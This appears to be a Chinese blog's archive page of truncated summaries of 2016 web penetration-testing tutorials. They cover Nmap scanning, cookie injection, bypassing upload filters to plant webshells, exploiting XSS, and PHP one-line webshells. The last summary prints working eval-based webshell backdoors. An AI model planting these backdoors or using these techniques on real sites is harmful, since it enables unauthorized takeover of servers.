09 2016 档案
摘要:一.什么是网站脚本语言 Asp Aspx Php jsp 二.如何探测目标站所使用的探测脚本语言 1.从url看 部分网站URL中会显示脚本 2.看首页文件index Index.asp Index.php 等等。。 3.Google hack语法 site:microtek.com.cn inur
阅读全文
摘要:本文由阿德马翻译自国外网站,请尊重劳动成果,转载请注明出处,谢谢Nmap是一款网络扫描和主机检测的非常有用的工具。Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统。Nmap是一款非常强大的实用工具,可用于:检测
阅读全文
摘要:1.先访问当前注入点文件名 2.修改cookie javascript:alert(document.cookie="id="+escape("1137")); 把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容 注入点: http://127.0.0.1:800/
阅读全文
摘要:1 概述 近几年来Internet变得更加不安全了。网络的通信量日益加大,越来越多的重要交易正在通过网络完成,与此同时数据被损坏、截取和修改的风险也在增加。 只要有值得偷窃的东西就会有想办法窃取它的人。Internet的今天比过去任何时候都更真实地体现出这一点,基于Linux的系统也不能摆脱这个“普
阅读全文
摘要:一般网站图片上传功能都对文件进行过滤,防止webshelll写入。但不同的程序对过滤也不一样,如何突破过滤继续上传? 本文总结了七种方法,可以突破! 1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php 2、使用edjpgcom工具向
阅读全文
摘要:一般发现一个xss漏洞后要做的基本上就是这些: 1. 伪造请求 使用$_REQUEST或$_GET 首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该X
阅读全文
摘要:一、端口扫描工具 Nmap 功能介绍及参数相关文档 1) 获取远程主机的系统类型及开放端口 nmap -sS -P0 -sV -O <target> 这里的 < target > 可以是单一 IP, 或主机名,或域名,或子网 -sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭
阅读全文
摘要:PHP一句话:1、普通一句话 <!--?php @eval($_POST['ki11']);?--> 2、防爆破一句话 <!--?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['ki11']);?--> //菜刀地址http:/
阅读全文